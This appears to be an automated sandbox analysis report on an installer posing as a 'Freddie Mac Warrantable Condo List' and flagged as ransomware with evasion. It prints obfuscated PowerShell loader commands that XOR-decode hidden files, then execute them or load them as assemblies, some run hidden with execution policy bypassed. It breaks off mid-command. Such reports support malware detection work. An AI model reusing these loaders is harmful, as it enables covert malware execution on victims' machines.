Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=296205125084197778 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=296205125084197778 --renderer-client-id=6 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_004AF110
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		5_2_0060F6D8

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

File created: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.rans.evad.winEXE@51/650@0/3

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Code function: 5_2_0062CFB8 GetVersion,CoCreateInstance,

5_2_0062CFB8

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Code function: 1_2_0041A4DC GetDiskFreeSpaceW,

1_2_0041A4DC

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_01

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Code function: 1_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,

1_2_004AF9F0

Source: Freddie-Mac-Warrantable-Condo-List.exe

String found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File opened: C:\Windows\SysWOW64\Msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Freddie-Mac-Warrantable-Condo-List.exe

Static file information: File size 103560224 > 1048576

Source: Freddie-Mac-Warrantable-Condo-List.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WiNDOwstylE HIddeN -Ep BYPAsS -cOMMaNd '$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT()'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt 